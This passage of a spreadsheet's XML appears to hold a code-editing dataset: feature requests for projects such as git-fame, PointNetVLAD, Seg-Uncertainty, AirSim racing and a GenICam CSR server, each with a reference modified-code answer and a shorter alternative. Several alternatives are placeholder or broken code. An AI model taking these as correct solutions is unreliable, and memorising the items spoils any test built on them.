\'fils\']\n        if cost:\n            if \'hours\' in cost:\n                headers.insert(1, \'hrs\')\n            if \'months\' in cost:\n                headers.insert(2 if \'hours\' in cost else 1, \'mths\')\n        \n        if row_nums:\n            headers.insert(0, \'#\')\n        \n        data = [headers]\n        row_num = 1\n        \n        for author in sorted(auth_stats.keys(), key=lambda x: auth_stats[x][\'loc\'], reverse=True):\n            row = []\n            if row_nums:\n                row.append(str(row_num))\n                row_num += 1\n            \n            row.append(author)\n            stats = auth_stats[author]\n            \n            if cost and \'hours\' in cost:\n                row.append(str(int(stats.get(\'hours\', 0))))\n            if cost and \'months\' in cost:\n                row.append(str(int(stats.get(\'months\', 0))))\n            \n            row.extend([str(stats[\'loc\']), str(stats[\'commits\']), str(len(stats[\'files\']))])\n            data.append(row)\n        \n        # Add totals row\n        totals_row = [\'TOTAL\'] if not row_nums else [\'\', \'TOTAL\']\n        if cost and \'hours\' in cost:\n            totals_row.append(str(int(stats_tot.get(\'hours\', 0))))\n        if cost and \'months\' in cost:\n            totals_row.append(str(int(stats_tot.get(\'months\', 0))))\n        totals_row.extend([str(stats_tot[\'loc\']), str(stats_tot[\'commits\']), str(stats_tot[\'files\'])])\n        data.append(totals_row)\n        \n        return format_custom(data, separator=custom_sep, header_char=custom_header_char)\n    \n    # #Modify - Existing backend handling continues\n    # ... rest of existing code ...\n\n# File 2: git-fame/tests/tests_gitfame.py - Add test for custom backend\n# #New - Add test for custom tabulate backend\ndef test_tabulate_custom():\n    """Test custom tabulate format"""\n    result = _gitfame.tabulate(auth_stats, stats_tot, backend=\'custom\')\n    assert \'Author\' in result\n    assert \'Casper da Costa-Luis\' in result\n    assert \'Not Committed Yet\' in result\n    assert \'TOTAL\' in result\n    assert \'|\' in result  # Default separator\n\ndef test_tabulate_custom_with_cost():\n    """Test custom tabulate with cost estimates"""\n    result = _gitfame.tabulate(auth_stats, stats_tot, cost={\'hours\', \'months\'}, backend=\'custom\')\n    assert \'Author\' in result\n    assert \'hrs\' in result or \'mths\' in result\n\ndef test_tabulate_custom_separator():\n    """Test custom tabulate with custom separator"""\n    result = _gitfame.tabulate(auth_stats, stats_tot, backend=\'custom\', custom_sep=\',\')\n    assert \',\' in result\n    assert \'Author\' in result'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def tabulate(auth_stats, stats_tot, backend=\'simple\', row_nums=False, cost=None):\n    """Format statistics for display"""\n    #Modify: Add support for new feature\n    if backend == \'new_feature\':\n        return new_feature_tabulate(auth_stats, stats_tot, row_nums, cost)\n    # Existing code...\n    return formatted_output', '#file 2': "result = tabulate(auth_stats, stats_tot, backend='new_feature', row_nums=True, cost={'hours', 'months'})\nprint(result)", '#file 3': 'def new_feature_tabulate(auth_stats, stats_tot, row_nums=False, cost=None):\n    """New tabulate function for the new feature"""\n    # New code to handle the new feature\n    formatted_output = """\n    New Feature Table\n    | Author               |   loc |   coms |   fils |  distribution   |\n    |:---------------------|------:|-------:|-------:|:----------------|\n    """\n    # Process auth_stats and stats_tot to generate the new feature table\n    return formatted_output'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'class NetVLAD(PoolingBaseModel):\n    def forward(self, reshaped_input):\n        # ... existing forward pass implementation ...\n        if self.gating:\n            vlad = super(self.__class__, self).context_gating(vlad)\n        return vlad', 'invoking_code_segment': 'def forward(point_cloud, is_training, bn_decay=None):\n    # ... existing code ...\n    NetVLAD = lp.NetVLAD(feature_size=1024, max_samples=num_points, cluster_size=CLUSTER_SIZE, \n                    output_dim=OUTPUT_DIM, gating=True, add_batch_norm=True,\n                    is_training=is_training)\n    net= tf.reshape(net,[-1,1024])\n    net = tf.nn.l2_normalize(net,1)\n    output = NetVLAD.forward(net)\n    output = tf.nn.l2_normalize(output,1)\n    output =  tf.reshape(output,[batch_num_queries,num_pointclouds_per_query,OUTPUT_DIM])\n    return output', 'feature_description': 'Add a ReLU activation function to the output of the NetVLAD forward function to introduce non-linearity and improve feature representation in the pooling layer.', 'modified_complete_code': '# pointnetvlad/loupe.py - Modified NetVLAD class\nclass NetVLAD(PoolingBaseModel):\n    """Creates a NetVLAD class.\n    """\n    def __init__(self, feature_size, max_samples, cluster_size, output_dim,\n            gating=True,add_batch_norm=True, is_training=True):\n        super(self.__class__, self).__init__(\n            feature_size=feature_size,\n            max_samples=max_samples,\n            cluster_size=cluster_size,\n            output_dim=output_dim,\n            gating=gating,\n            add_batch_norm=add_batch_norm,\n            is_training=is_training)\n\n    def forward(self, reshaped_input):\n        """Forward pass of a NetVLAD block.\n\n        Args:\n        reshaped_input: If your input is in that form:\n        \'batch_size\' x \'max_samples\' x \'feature_size\'\n        It should be reshaped in the following form:\n        \'batch_size*max_samples\' x \'feature_size\'\n        by performing:\n        reshaped_input = tf.reshape(input, [-1, features_size])\n\n        Returns:\n        vlad: the pooled vector of size: \'batch_size\' x \'output_dim\'\n        """\n\n        cluster_weights = tf.get_variable("cluster_weights",\n              [self.feature_size, self.cluster_size],\n              initializer = tf.random_normal_initializer(\n              stddev=1 / math.sqrt(self.feature_size)))\n       \n        activation = tf.matmul(reshaped_input, cluster_weights)\n\n        if self.add_batch_norm:\n          activation = slim.batch_norm(\n              activation,\n              center=True,\n              scale=True,\n              is_training=self.is_training,\n              scope="cluster_bn", fused=False)\n        else:\n          cluster_biases = tf.get_variable("cluster_biases",\n            [self.cluster_size],\n            initializer = tf.random_normal_initializer(\n            stddev=1 / math.sqrt(self.feature_size)))\n          activation += cluster_biases\n        \n        activation = tf.nn.softmax(activation)\n\n        activation = tf.reshape(activation,\n                [-1, self.max_samples, self.cluster_size])\n\n        a_sum = tf.reduce_sum(activation,-2,keep_dims=True)\n\n        cluster_weights2 = tf.get_variable("cluster_weights2",\n            [1,self.feature_size, self.cluster_size],\n            initializer = tf.random_normal_initializer(\n                stddev=1 / math.sqrt(self.feature_size)))\n        \n        a = tf.multiply(a_sum,cluster_weights2)\n        \n        activation = tf.transpose(activation,perm=[0,2,1])\n        \n        reshaped_input = tf.reshape(reshaped_input,[-1,\n            self.max_samples, self.feature_size])\n\n        vlad = tf.matmul(activation,reshaped_input)\n        vlad = tf.transpose(vlad,perm=[0,2,1])\n        vlad = tf.subtract(vlad,a)\n        \n        vlad = tf.nn.l2_normalize(vlad,1)\n\n        vlad = tf.reshape(vlad,[-1, self.cluster_size*self.feature_size])\n        vlad = tf.nn.l2_normalize(vlad,1)\n\n        hidden1_weights = tf.get_variable("hidden1_weights",\n          [self.cluster_size*self.feature_size, self.output_dim],\n          initializer=tf.random_normal_initializer(\n          stddev=1 / math.sqrt(self.cluster_size)))\n\n        vlad = tf.matmul(vlad, hidden1_weights)\n\n        vlad = tf.contrib.layers.batch_norm(vlad, \n                                          center=True, scale=True, \n                                          is_training=self.is_training,\n                                          scope=\'bn\')\n\n        if self.gating:\n            vlad = super(self.__class__, self).context_gating(vlad)\n\n        #Modify: Apply ReLU activation to the output\n        vlad = tf.nn.relu(vlad)\n\n        return vlad\n\n# pointnetvlad/pointnetvlad_cls.py - Modified forward function\ndef forward(point_cloud, is_training, bn_decay=None):\n    """PointNetVLAD,    INPUT is batch_num_queries X num_pointclouds_per_query X num_points_per_pointcloud X 3, \n                        OUTPUT batch_num_queries X num_pointclouds_per_query X output_dim """\n    batch_num_queries = point_cloud.get_shape()[0].value\n    num_pointclouds_per_query = point_cloud.get_shape()[1].value\n    num_points = point_cloud.get_shape()[2].value\n    CLUSTER_SIZE=64\n    OUTPUT_DIM=256\n    point_cloud = tf.reshape(point_cloud, [batch_num_queries*num_pointclouds_per_query, num_points,3])\n\n    with tf.variable_scope(\'transform_net1\') as sc:\n        input_transform = input_transform_net(point_cloud, is_training, bn_decay, K=3)\n    point_cloud_transformed = tf.matmul(point_cloud, input_transform)\n    input_image = tf.expand_dims(point_cloud_transformed, -1)\n\n    net = tf_util.conv2d(input_image, 64, [1,3],\n                         padding=\'VALID\', stride=[1,1],\n                         is_training=is_training,\n                         scope=\'conv1\', bn_decay=bn_decay)\n    net = tf_util.conv2d(net, 64, [1,1],\n                         padding=\'VALID\', stride=[1,1],\n                         is_training=is_training,\n                         scope=\'conv2\', bn_decay=bn_decay)\n\n    with tf.variable_scope(\'transform_net2\') as sc:\n        feature_transform = feature_transform_net(net, is_training, bn_decay, K=64)\n    net_transformed = tf.matmul(tf.squeeze(net, axis=[2]), feature_transform)\n    net_transformed = tf.expand_dims(net_transformed, [2])\n\n    net = tf_util.conv2d(net_transformed, 64, [1,1],\n                         padding=\'VALID\', stride=[1,1],\n                         is_training=is_training,\n                         scope=\'conv3\', bn_decay=bn_decay)\n    net = tf_util.conv2d(net, 128, [1,1],\n                         padding=\'VALID\', stride=[1,1],\n                         is_training=is_training,\n                         scope=\'conv4\', bn_decay=bn_decay)\n    net = tf_util.conv2d(net, 1024, [1,1],\n                         padding=\'VALID\', stride=[1,1],\n                         is_training=is_training,\n                         scope=\'conv5\', bn_decay=bn_decay)\n\n    NetVLAD = lp.NetVLAD(feature_size=1024, max_samples=num_points, cluster_size=CLUSTER_SIZE, \n                    output_dim=OUTPUT_DIM, gating=True, add_batch_norm=True,\n                    is_training=is_training)\n\n    net= tf.reshape(net,[-1,1024])\n    net = tf.nn.l2_normalize(net,1)\n    #Modify: Call forward function which now includes ReLU activation\n    output = NetVLAD.forward(net)\n    print(output)\n\n    output = tf.nn.l2_normalize(output,1)\n    output =  tf.reshape(output,[batch_num_queries,num_pointclouds_per_query,OUTPUT_DIM])\n\n    return output'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def forward(point_cloud, is_training, bn_decay=None):\n    # ... (existing code)\n    NetVLAD = lp.NetVLAD(feature_size=1024, max_samples=num_points, cluster_size=CLUSTER_SIZE,\n                    output_dim=OUTPUT_DIM, gating=True, add_batch_norm=True,\n                    is_training=is_training)\n    net= tf.reshape(net,[-1,1024])\n    net = tf.nn.l2_normalize(net,1)\n    output = NetVLAD.forward(net)\n    # ... (existing code)\n    return output\n\n#Modify for modified parts\ndef enhanced_forward(point_cloud, is_training, bn_decay=None):\n    # Existing forward logic\n    output = forward(point_cloud, is_training, bn_decay)\n    # New feature integration\n    enhanced_output = new_feature_function(output)\n    return enhanced_output', '#file 2': 'def placeholder_inputs(batch_num_queries, num_pointclouds_per_query, num_point):\n    pointclouds_pl = tf.placeholder(tf.float32, shape=(batch_num_queries, num_pointclouds_per_query, num_point, 3))\n    return pointclouds_pl\n\n# ... (existing code)\n\n#Modify for modified parts\noutput = enhanced_forward(point_cloud, is_training, bn_decay=bn_decay)', '#file 3': 'def new_feature_function(input_tensor):\n    # New feature implementation\n    processed_tensor = tf.nn.relu(input_tensor)\n    return processed_tensor\n\n# New for additional functionality\ndef enhanced_forward(point_cloud, is_training, bn_decay=None):\n    # Existing forward logic\n    output = forward(point_cloud, is_training, bn_decay)\n    # New feature integration\n    enhanced_output = new_feature_function(output)\n    return enhanced_output'}</t>
  </si>
  <si>
    <t>{'called_code_segment': "def colorize_mask(mask):\n    # mask: numpy array of the mask\n    new_mask = Image.fromarray(mask.astype(np.uint8)).convert('P')\n    new_mask.putpalette(palette)\n    return new_mask\n\ndef save(output_name):\n    output, name = output_name\n    output_col = colorize_mask(output)\n    output = Image.fromarray(output)\n    output.save('%s' % (name))\n    output_col.save('%s_color.png' % (name.split('.jpg')[0]))\n    return", 'invoking_code_segment': "from evaluate_robot import colorize_mask,save\n...\nfor ind in range(len(gt_imgs)):\n    label = np.array(Image.open(gt_imgs[ind]))\n    label = label_mapping(label, mapping)\n    label = label[:,:,0].astype(np.uint8)\n    name_tmp = gt_imgs[ind].replace('anno','anno_color')\n    save([label, name_tmp])", 'feature_description': 'Add a feature to save the mask with an additional transparency layer. This allows masks to be saved as RGBA images with an alpha channel, enabling transparency support for better visualization and compositing capabilities.', 'modified_complete_code': '# File 1: Seg-Uncertainty/utils/tool.py (no changes needed)\n\n# File 2: Seg-Uncertainty/evaluate_robot.py\n# #Modify - Updated colorize_mask function to support transparency\ndef colorize_mask(mask, alpha=None):\n    # mask: numpy array of the mask\n    # alpha: optional numpy array for transparency layer\n    new_mask = Image.fromarray(mask.astype(np.uint8)).convert(\'P\')\n    new_mask.putpalette(palette)\n    \n    # #New - Add transparency layer if alpha is provided\n    if alpha is not None:\n        new_mask.putalpha(Image.fromarray(alpha.astype(np.uint8)))\n    \n    return new_mask\n\n# #Modify - Updated save function to handle transparency\ndef save(output_name, alpha_channel=None):\n    output, name = output_name\n    output_col = colorize_mask(output, alpha=alpha_channel)\n    output = Image.fromarray(output)\n    \n    output.save(\'%s\' % (name))\n    # #Modify - Save with transparency if alpha channel exists\n    if alpha_channel is not None:\n        output_col_rgba = output_col.convert(\'RGBA\')\n        output_col_rgba.save(\'%s_color.png\' % (name.split(\'.jpg\')[0]))\n    else:\n        output_col.save(\'%s_color.png\' % (name.split(\'.jpg\')[0]))\n    return\n\n# File 3: Seg-Uncertainty/convert_robot_color.py\n# #Modify - Updated import and function call to support transparency\nfrom evaluate_robot import colorize_mask, save\nfrom compute_iou import label_mapping\n\ndef main(gt_dir=\'./data/Oxford_Robot_ICCV19/anno\', devkit_dir = \'./dataset/robot_list/\'):\n    """\n    Compute IoU given the predicted colorized images with transparency support\n    """\n    with open(join(devkit_dir, \'info.json\'), \'r\') as fp:\n      info = json.load(fp)\n    image_path_list = join(devkit_dir, \'val.txt\')\n    label_path_list = join(devkit_dir, \'label.txt\')\n    mapping = np.array(info[\'label2train\'], dtype=np.int)\n    gt_imgs = open(label_path_list, \'r\').read().splitlines()\n    gt_imgs = [join(gt_dir, x) for x in gt_imgs]\n\n    for ind in range(len(gt_imgs)):\n        label = np.array(Image.open(gt_imgs[ind]))\n        label = label_mapping(label, mapping)\n        label = label[:,:,0].astype(np.uint8)\n        # #New - Create alpha channel with full opacity\n        alpha_channel = np.full_like(label, 255, dtype=np.uint8)\n        name_tmp = gt_imgs[ind].replace(\'anno\',\'anno_color\')\n        # #Modify - Pass alpha channel to save function\n        save([label, name_tmp], alpha_channel=alpha_channel)\n    \n    return'}</t>
  </si>
  <si>
    <t>{'#file 1': "def colorize_mask(mask):\n    # mask: numpy array of the mask\n    new_mask = Image.fromarray(mask.astype(np.uint8)).convert('P')\n    new_mask.putpalette(palette)\n    #Modify: Add alpha channel\n    alpha = np.where(mask &gt; 0, 255, 0).astype(np.uint8)\n    new_mask.putalpha(Image.fromarray(alpha))\n    return new_mask", '#file 2': "from utils.tool import fliplr\nimport matplotlib.pyplot as plt\nimport torch.nn as nn\nimport yaml\nimport time\n\n# ...\n\ndef save(output_name):\n    output, name = output_name\n    output_col = colorize_mask(output)\n    output = Image.fromarray(output)\n    output.save('%s' % (name))\n    #Modify: Save transparency layer\n    output_col.save('%s_color_alpha.png' % (name.split('.jpg')[0]))\n    return", '#file 3': "from evaluate_robot import colorize_mask, save\nfrom compute_iou import label_mapping\n\n# ...\n\nfor ind in range(len(gt_imgs)):\n    label = np.array(Image.open(gt_imgs[ind]))\n    label = label_mapping(label, mapping)\n    label = label[:,:,0].astype(np.uint8)\n    name_tmp = gt_imgs[ind].replace('anno','anno_color')\n    save([label, name_tmp])\n    \nreturn"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'class BaselineRacer with methods image_callback() and start_image_callback_thread()', 'invoking_code_segment': 'BaselineRacerImageBenchmarker class inheriting from BaselineRacer and overriding image callback methods in baseline_racer_image_benchmarker.py', 'feature_description': 'Add a feature to save the images captured by the drone to a specified directory. This includes modifying the image callback methods to save frames to disk and adding a parameter to specify the output directory.', 'modified_complete_code': '# File 1: baselines/utils.py - Add at the end:\n#New\nimport os\nfrom datetime import datetime\n\nclass ImageSaver:\n    def __init__(self, output_dir=None):\n        if output_dir is None:\n            output_dir = os.path.join(os.path.expanduser(\'~\'), \'Documents\', \'AirSim\', \'captured_images\')\n        self.output_dir = output_dir\n        if not os.path.exists(self.output_dir):\n            os.makedirs(self.output_dir)\n        self.frame_count = 0\n    \n    def save_image(self, img_rgb, prefix=\'frame\'):\n        timestamp = datetime.now().strftime(\'%Y%m%d_%H%M%S\')\n        filename = os.path.join(self.output_dir, f\'{prefix}_{self.frame_count:06d}_{timestamp}.png\')\n        import cv2\n        cv2.imwrite(filename, img_rgb)\n        self.frame_count += 1\n        return filename\n\n# File 2: baselines/baseline_racer.py - Modify __init__ method:\n#Modify\nclass BaselineRacer(object):\n    def __init__(self, drone_name = "drone_1", viz_traj=True, viz_traj_color_rgba=[1.0, 0.0, 0.0, 1.0], viz_image_cv2=True, save_images=False, image_save_dir=None):\n        self.drone_name = drone_name\n        self.gate_poses_ground_truth = None\n        self.viz_image_cv2 = viz_image_cv2\n        self.viz_traj = viz_traj\n        self.viz_traj_color_rgba = viz_traj_color_rgba\n        #New\n        self.save_images = save_images\n        self.image_saver = None\n        if self.save_images:\n            self.image_saver = utils.ImageSaver(output_dir=image_save_dir)\n        # ... rest of __init__ remains the same\n\n#Modify\n    def image_callback(self):\n        # get uncompressed fpv cam image\n        request = [airsim.ImageRequest("fpv_cam", airsim.ImageType.Scene, False, False)]\n        response = self.airsim_client_images.simGetImages(request)\n        img_rgb_1d = np.fromstring(response[0].image_data_uint8, dtype=np.uint8) \n        img_rgb = img_rgb_1d.reshape(response[0].height, response[0].width, 3)\n        #New\n        if self.save_images and self.image_saver is not None:\n            self.image_saver.save_image(img_rgb, prefix=\'fpv_cam\')\n        if self.viz_image_cv2:\n            cv2.imshow("img_rgb", img_rgb)\n            cv2.waitKey(1)\n\n# File 3: baselines/baseline_racer_image_benchmarker.py - Modify __init__ method:\n#Modify\nclass BaselineRacerImageBenchmarker(BaselineRacer):\n    def __init__(self, \n            img_benchmark_type = \'simGetImage\', \n            drone_name = "drone_1", \n            viz_traj = False, \n            viz_traj_color_rgba=[1.0, 1.0, 0.0, 1.0], \n            viz_image_cv2 = False,\n            #New\n            save_images = False,\n            image_save_dir = None):\n        super().__init__(drone_name=drone_name, viz_traj=viz_traj, viz_image_cv2=viz_image_cv2, save_images=save_images, image_save_dir=image_save_dir)\n        # ... rest of __init__ remains the same\n\n#Modify\n    def image_callback_benchmark_simGetImage(self):\n        self.image_benchmark_num_images += 1\n        iter_start_time = time.time()\n        response = self.airsim_client_images.simGetImage("fpv_cam", airsim.ImageType.Scene)\n        img_rgb = cv2.imdecode(airsim.string_to_uint8_array(response), cv2.IMREAD_UNCHANGED)\n        #New\n        if self.save_images and self.image_saver is not None:\n            self.image_saver.save_image(img_rgb, prefix=\'benchmark_simGetImage\')\n        self.image_benchmark_total_time += time.time() - iter_start_time\n        avg_fps = 1.0 / ((self.image_benchmark_total_time) / float(self.image_benchmark_num_images))\n        print(self.level_name + ": {} avg_fps for {} num of images".format(avg_fps, self.image_benchmark_num_images))\n\n#Modify\n    def image_callback_benchmark_simGetImages(self):\n        self.image_benchmark_num_images += 1\n        iter_start_time = time.time()\n        request = [airsim.ImageRequest("fpv_cam", airsim.ImageType.Scene, False, False)]\n        response = self.airsim_client_images.simGetImages(request)\n        img_rgb_1d = np.fromstring(response[0].image_data_uint8, dtype=np.uint8) \n        img_rgb = img_rgb_1d.reshape(response[0].height, response[0].width, 3)\n        #New\n        if self.save_images and self.image_saver is not None:\n            self.image_saver.save_image(img_rgb, prefix=\'benchmark_simGetImages\')\n        self.image_benchmark_total_time += time.time() - iter_start_time\n        avg_fps = 1.0 / ((self.image_benchmark_total_time) / float(self.image_benchmark_num_images))\n        print(self.level_name + ": {} avg_fps for {} num of images".format(avg_fps, self.image_benchmark_num_images))\n\n#New - Add to main function in baseline_racer_image_benchmarker.py:\n    baseline_racer = BaselineRacerImageBenchmarker(img_benchmark_type=args.img_benchmark_type, drone_name="drone_1", viz_traj=args.viz_traj, viz_traj_color_rgba=[1.0, 1.0, 0.0, 1.0], viz_image_cv2=args.viz_image_cv2, save_images=args.save_images, image_save_dir=args.image_save_dir)\n\n#New - Add argument parser options:\n    parser.add_argument(\'--save_images\', dest=\'save_images\', action=\'store_true\', default=False)\n    parser.add_argument(\'--image_save_dir\', type=str, default=None)'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def image_callback(self):\n    # get uncompressed fpv cam image\n    request = [airsim.ImageRequest("fpv_cam", airsim.ImageType.Scene, False, False)]\n    response = self.airsim_client_images.simGetImages(request)\n    img_rgb_1d = np.fromstring(response[0].image_data_uint8, dtype=np.uint8)\n    img_rgb = img_rgb_1d.reshape(response[0].height, response[0].width, 3)\n    if self.viz_image_cv2:\n        cv2.imshow("img_rgb", img_rgb)\n        cv2.waitKey(1)\n    #Modify: Save image to specified directory\n    if self.save_images:\n        timestamp = time.strftime("%Y%m%d-%H%M%S")\n        img_filename = os.path.join(self.image_save_dir, f"img_{timestamp}.png")\n        cv2.imwrite(img_filename, img_rgb)', '#file 2': 'def repeat_timer_image_callback(self, task, period):\n    while self.is_image_thread_active:\n        task()\n        time.sleep(period)\n\ndef start_image_callback_thread(self):\n    if not self.is_image_thread_active:\n        self.is_image_thread_active = True\n        self.image_callback_thread.start()\n        print("Started image callback thread")\n\ndef stop_image_callback_thread(self):\n    if self.is_image_thread_active:\n        self.is_image_thread_active = False\n        self.image_callback_thread.join()\n        print("Stopped image callback thread.")\n\n#New: Add image saving directory and flag\nself.save_images = True\nself.image_save_dir = "/path/to/save/images"\nif not os.path.exists(self.image_save_dir):\n    os.makedirs(self.image_save_dir)', '#file 3': 'def main(args):\n    # ensure you have generated the neurips planning settings file by running python generate_settings_file.py\n    baseline_racer = BaselineRacer(drone_name="drone_1", viz_traj=args.viz_traj, viz_traj_color_rgba=[1.0, 1.0, 0.0, 1.0], viz_image_cv2=args.viz_image_cv2)\n    baseline_racer.load_level(args.level_name)\n    if args.level_name == "Qualifier_Tier_1":\n        args.race_tier = 1\n    if args.level_name == "Qualifier_Tier_2":\n        args.race_tier = 2\n    if args.level_name == "Qualifier_Tier_3":\n        args.race_tier = 3\n    baseline_racer.start_race(args.race_tier)\n    baseline_racer.initialize_drone()\n    baseline_racer.takeoff_with_moveOnSpline()\n    baseline_racer.get_ground_truth_gate_poses()\n    baseline_racer.start_image_callback_thread()\n    baseline_racer.start_odometry_callback_thread()\n\n    if args.planning_baseline_type == "all_gates_at_once" :\n        if args.planning_and_control_api == "moveOnSpline":\n            baseline_racer.fly_through_all_gates_at_once_with_moveOnSpline().join()\n        if args.planning_and_control_api == "moveOnSplineVelConstraints":\n            baseline_racer.fly_through_all_gates_at_once_with_moveOnSplineVelConstraints().join()\n\n    # Comment out the following if you observe the python script exiting prematurely, and resetting the race\n    baseline_racer.stop_image_callback_thread()\n    baseline_racer.stop_odometry_callback_thread()\n    baseline_racer.reset_race()'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'CSRServer.read() and CSRServer.write() methods in CSR.py', 'invoking_code_segment': 'CTestPort.Read() and CTestPort.Write() methods in testport.py, which call self.csr.read() and self.csr.write()', 'feature_description': "Add logging to track the number of reads and writes operations in CSRServer class. The CSRServer maintains counters for read and write operations, and CTestPort exposes methods to retrieve these statistics similar to CStructTestPort's GetNumReads() and GetNumWrites() methods.", 'modified_complete_code': '# CSR.py - Modified CSRServer class\nclass CSRServer(object):\n    def __init__(self, regmap=None):\n        # map from register start to rmap\n        self.rmaps = [RMap(), ]\n        # #New - Add logging counters\n        self.m_NumReads = 0\n        self.m_NumWrites = 0\n        if regmap is not None:\n            self.registerRMap(regmap)\n\n    def registerRMap(self, rmap):\n        \'\'\'\n        register a new address to register mapping\n        :param rmap: rmap to register\n        \'\'\'\n        self.rmaps.append(rmap)\n\n    def newReg(self, reg):\n        \'\'\'\n        register a new address to first register map\n        :param rmap: rmap to register\n        \'\'\'\n        self.rmaps[0].newReg(reg)\n\n    # #New - Add method to get read count\n    def GetNumReads(self):\n        return self.m_NumReads\n\n    # #New - Add method to get write count\n    def GetNumWrites(self):\n        return self.m_NumWrites\n\n    # #New - Add method to reset statistics\n    def ResetStatistics(self):\n        self.m_NumReads = 0\n        self.m_NumWrites = 0\n\n    def read(self, addr, length):\n        \'\'\'\n        is called on a read to a register\n        if the access to the register is smaller than the reg width,\n        this class handles the read of the relevant bytes\n        :param addr: base address of access\n        :param length: length of access\n        \'\'\'\n        # #Modify - Increment read counter\n        self.m_NumReads += 1\n        read_data = bytes()\n        read_length = length\n        for rmap in self.rmaps:\n            regset = rmap.findRegisters(addr, read_length)\n            for reg in regset:\n                if reg.addr &gt; addr:\n                    read_data += bytes(reg.addr - addr)\n                    read_length -= (reg.addr - addr)\n                    addr += (reg.addr - addr)\n                    reg_data = reg.read(0, min(read_length, reg.length))\n                    raise genicam.GenericException(\n                        "Register not readable at address 0x%x with length %d" % (addr, length), "", 0)\n                else:\n                    reg_offs = addr - reg.addr\n                    reg_data = reg.read(\n                        reg_offs, min(read_length, reg.length - reg_offs))\n\n                read_data += reg_data\n                addr += len(reg_data)\n                read_length -= len(reg_data)\n        if length - len(read_data) &gt; 0:\n            read_data += bytes(length - len(read_data))\n            raise genicam.GenericException("Register not readable at address 0x%x with length %d" % (addr, length), "", 0)\n        return read_data\n\n    def write(self, addr, data):\n        \'\'\'\n        is called on a write to a register\n        if the write is misaligned, this method handles the read modify write of\n        the underlying registers\n        :param addr: base address of access\n        :param length: length of acces\n        \'\'\'\n        # #Modify - Increment write counter\n        self.m_NumWrites += 1\n        length = len(data)\n        for rmap in self.rmaps:\n            regset = rmap.findRegisters(addr, length)\n            if not regset:\n                raise genicam.GenericException(\n                        "There is no register at address 0x%x with length %d" % (addr, length), "", 0)\n\n            for reg in regset:\n                if addr &lt; reg.addr:\n                    data = data[reg.addr - addr:]\n                    addr = reg.addr\n                    reg_offs = 0\n                    raise genicam.GenericException(\n                        "Register not writable at address 0x%x with length %d Too Low" % (addr, length), "", 0)\n                elif addr &gt;= reg.addr:\n                    reg_offs = addr - reg.addr\n\n                write_len = min(length, reg.length - reg_offs)\n                reg.write(reg_offs, data[:write_len])\n                if write_len &lt; len(data):\n                    raise genicam.GenericException(\n                        "Register not writable at address 0x%x with length %d" % (addr, length), "", 0)\n\n# testport.py - Modified CTestPort class\nclass CTestPort(genicam.CPortImpl):\n    """\n    genicam device port implementation\n    """\n\n    def __init__(self):\n        genicam.CPortImpl.__init__(self)\n        self.isOpen = True\n        self.csr = CSR.CSRServer()\n\n    def Read(self, address, length):\n        return self.csr.read(address, length)\n\n    def Write(self, address, data):\n        self.csr.write(address, data)\n\n    def GetAccessMode(self):\n        if self.isOpen:\n            return genicam.RW\n        else:\n            return genicam.NA\n\n    def Open(self):\n        self.isOpen = True\n\n    def Close(self):\n        self.isOpen = False\n\n    def CreateEntry(self, addr, dtype, value, accessmode, endianess):\n        if dtype.startswith("str"):\n            data = value.encode("utf-8")\n        elif dtype == "raw":\n            data = value\n        else:\n            data = cast_data(dtype, endianess, value)\n        reg = CSR.LocalStorageReg(addr, len(data), data, accessmode)\n        self.csr.newReg(reg)\n        return reg\n\n    def LookupEntry(self, addr, dtype):\n        raise NotImplementedError\n\n    def UpdateEntry(self, addr, data, accessmode):\n        res = self.csr.rmaps[0].findRegisters(addr, len(data))\n        assert len(res) == 1\n        assert res[0].addr == addr\n        assert res[0].length == len(data)\n        res[0].accessmode = accessmode\n        res[0].data = data\n\n    def Replay(self, **args):\n        raise NotImplementedError\n\n    def ShowMap(self):\n        for rm in self.csr.rmaps:\n            for r in rm.rmap:\n                print(r)\n\n    # #New - Add method to get read count from CSRServer\n    def GetNumReads(self):\n        return self.csr.GetNumReads()\n\n    # #New - Add method to get write count from CSRServer\n    def GetNumWrites(self):\n        return self.csr.GetNumWrites()\n\n    # #New - Add method to reset statistics in CSRServer\n    def ResetStatistics(self):\n        self.csr.ResetStatistics()'}</t>
  </si>
  <si>
    <t>{'#file 1': 'class LocalStorageReg(Register):\n    def __init__(self, addr, length, preset=None, accessmode=genicam.RW):\n        Register.__init__(self, addr, length, accessmode)\n        if preset is None:\n            self.data = bytes(length)\n        else:\n            assert len(preset) == length\n            self.data = preset\n        self.read_count = 0  # New\n        self.write_count = 0  # New\n\n    def read(self, offset, length=None):\n        assert offset &lt; self.length\n        assert offset + length &lt;= self.length\n\n        if not genicam.IsReadable(self.accessmode):\n            raise genicam.RuntimeException(\n                "Register not readable at address 0x%x with length %d" % (self.addr + offset, length), "", 0)\n\n        self.read_count += 1  # Modify\n        if length is None:\n            return self.data[offset:]\n        else:\n            return self.data[offset:offset + length]\n\n    def write(self, offset, data):\n        assert offset &lt; self.length\n        assert offset + len(data) &lt;= self.length\n\n        if not genicam.IsWritable(self.accessmode):\n            raise genicam.RuntimeException(\n                "Register not writable at address 0x%x with length %d" % (self.addr + offset, len(data)), "", 0)\n\n        self.write_count += 1  # Modify\n        self.data = self.data[0:offset] + data + self.data[offset + len(data):]', '#file 2': 'class CTestPort(genicam.CPortImpl):\n    ...\n    def Read(self, address, length):\n        self.m_NumReads += 1  # Modify\n        return super(CTestPort, self).Read(address, length)\n\n    def Write(self, address, data):\n        self.m_NumWrites += 1  # Modify\n        return super(CTestPort, self).Write(address, data)', '#file 3': 'def test_Command01(self):\n    ...\n    Port = CTestPort()\n    Port.CreateEntry(0x00ff, "uint32_t", 42, genicam.RW, genicam.BigEndian)\n    ...\n    Port.Write(0x0110, "1234".encode())\n    print(Port.Read(0x0110, 5))\n    ...\n    print("Read Count: ", Port.m_NumReads)  # New\n    print("Write Count: ", Port.m_NumWrites)  # New'}</t>
  </si>
  <si>
